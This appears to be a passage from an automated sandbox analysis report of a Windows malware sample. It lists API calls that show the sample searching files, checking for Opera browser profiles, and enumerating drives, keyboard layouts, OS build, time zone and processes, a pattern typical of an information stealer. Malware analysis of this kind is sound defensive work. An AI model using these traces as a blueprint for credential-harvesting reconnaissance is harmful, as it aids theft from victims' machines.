                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 00401807
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 00401816
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401B64
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000), ref: 00401B73
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                      • Part of subcall function 004114D0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalFree.KERNEL32(?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E01
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                    • String ID: %$% @4$L3B$\*.*
                                                                                                                                                                                                                                                    • API String ID: 2707319931-2476820021
                                                                                                                                                                                                                                                    • Opcode ID: b404b2350f501b77ef3d5968e416dad7fa2239cfcc1ffbd18540537f2c1183ca
                                                                                                                                                                                                                                                    • Instruction ID: 0d12e94010ad0c5bae65058addcf50d016e2cabbf55f6482a863c875b0e5c03a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b404b2350f501b77ef3d5968e416dad7fa2239cfcc1ffbd18540537f2c1183ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B726B30804288EACB15EBA5C955BDDBBB86F25308F5440BEE506736D2DB782B4CCB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040AF10 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 658fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,004268EB,?,?,00000000), ref: 0040AFA2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426B28,?,00000000), ref: 0040B01C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426B2C,?,00000000), ref: 0040B036
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera,004268FA,004268F7,004268F6,004268F3,004268F2,004268EF,004268EE,?,00000000), ref: 0040B0CB
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,?,00000000), ref: 0040B0E3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera Crypto,?,00000000), ref: 0040B0FB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                    • String ID: :$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                    • API String ID: 2567437900-1444899082
                                                                                                                                                                                                                                                    • Opcode ID: 72390aa4f40f08705d5c468ee64810f5c1ed78beffdb15f489cb743d0a7cff78
                                                                                                                                                                                                                                                    • Instruction ID: 1d2c468c39cacdb76342c6c40617b62471d6fbb41a0d231a9737eaa3d7f72c84
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72390aa4f40f08705d5c468ee64810f5c1ed78beffdb15f489cb743d0a7cff78
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16528F30901248EADB15EBA5C955BDDBBB86F19304F5040BEE406736D2DB782B4CCBB6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00416750 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 177stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004167C9
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004167EE
                                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(00000000,?,?,00000004), ref: 004167F7
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00416816
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00416834
                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00416857
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004168BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                    • API String ID: 1884655365-147700698
                                                                                                                                                                                                                                                    • Opcode ID: 3b74bf27872f1abc26cc06abfc262733de611be0a900d8180cdc3aef528747f9
                                                                                                                                                                                                                                                    • Instruction ID: 49d03d9c4bad79a8dd4c39d4ea67452dd68ffa38f43acce7c1d049db5cde4bef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b74bf27872f1abc26cc06abfc262733de611be0a900d8180cdc3aef528747f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB618F71500348ABDB20EF61CC46FEE7B69AF05704F50412AB909672C2DF78BA48CB69
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040A410 Relevance: 13.8, APIs: 9, Instructions: 329fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,004268DF,00000000,?,00426AE0,?,?,004268DF,?,00000004), ref: 0040A4A1
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426AE4), ref: 0040A4DD
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426AE8), ref: 0040A4F7
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015D1EF8,00000000,?,?,?,00426AEC,?,?,004268E2), ref: 0040A58C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2567437900-0
                                                                                                                                                                                                                                                    • Opcode ID: feebf728ddc35abdd0333e99622beafaf52dfbac5eb61752111df047f5aa0221
                                                                                                                                                                                                                                                    • Instruction ID: 0c354dfb940c8eaad85f7de44e4c6f6ad6069b37fd6802769f14803bf13ff224
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: feebf728ddc35abdd0333e99622beafaf52dfbac5eb61752111df047f5aa0221
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD17E70901348EACB10EBB5C9466DE7FB9AF19704F10817EE805736C2DB785B48CAE6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410220 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00426EBF,?,?,00000001), ref: 00410267
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410279
                                                                                                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410284
                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102B6
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041035A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                    • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                    • Opcode ID: ba2344f93ef7c8b9ac3dba28a2cb6a4edc6f70048faf3c7aa7115a21f85121c1
                                                                                                                                                                                                                                                    • Instruction ID: ca7efd8bb8a7f342775f4ad1350c8e05381c22e3c48d07e1d90f753cfa6eadc8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba2344f93ef7c8b9ac3dba28a2cb6a4edc6f70048faf3c7aa7115a21f85121c1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81317271900219EBDB10DFD5C885BEEB7B9FB48700F50406EF60AB3681C7785A84CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410050 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410065
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041006C
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,015CB448,00000000,00020119,?), ref: 0041008B
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004100A5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                    • API String ID: 3676486918-1022791448
                                                                                                                                                                                                                                                    • Opcode ID: f86bfa1d72bce3a91806850ef9609ee4282c273ca8f2f27804968a7aa7b614ca
                                                                                                                                                                                                                                                    • Instruction ID: 831f6641a5be1d16d28d894e320762782144b9a233d4441af1664d1f71a42602
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f86bfa1d72bce3a91806850ef9609ee4282c273ca8f2f27804968a7aa7b614ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FF062B9641224FBE710DBE0EC0AFAB7B7DDB09701F001155FB05E6281E6B46A4487B5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004101B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004101C1
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004101C8
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 004101D7
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00410202
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                    • String ID: wwww
                                                                                                                                                                                                                                                    • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                    • Opcode ID: 4347065252f37f9c51df4bdca032b66e6890cfc83b8850cda8aac36e823e601a
                                                                                                                                                                                                                                                    • Instruction ID: 1ac8175d98f5b2bea96028f8c8eb09c26686de18e8d258bd10e9e21a68b62837
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4347065252f37f9c51df4bdca032b66e6890cfc83b8850cda8aac36e823e601a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F0EC75B00224ABE71C5BB8DC0EFAA7B1E9B46311F054365FE06CB6D0DA705C1447D5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410950 Relevance: 7.6, APIs: 5, Instructions: 80processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041099F
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004109AF
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004109C1
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00410A2E
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410A39
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 562399079-0
                                                                                                                                                                                                                                                    • Opcode ID: d1c5609bdcb45373de83fa625fcefc407bd4f6fd6ac007dfdf391f746e936118
                                                                                                                                                                                                                                                    • Instruction ID: c466c9b2dc6976ffa1225e447c95bf3bb608c55d1892e3c3d8f77e5e2a79bc69
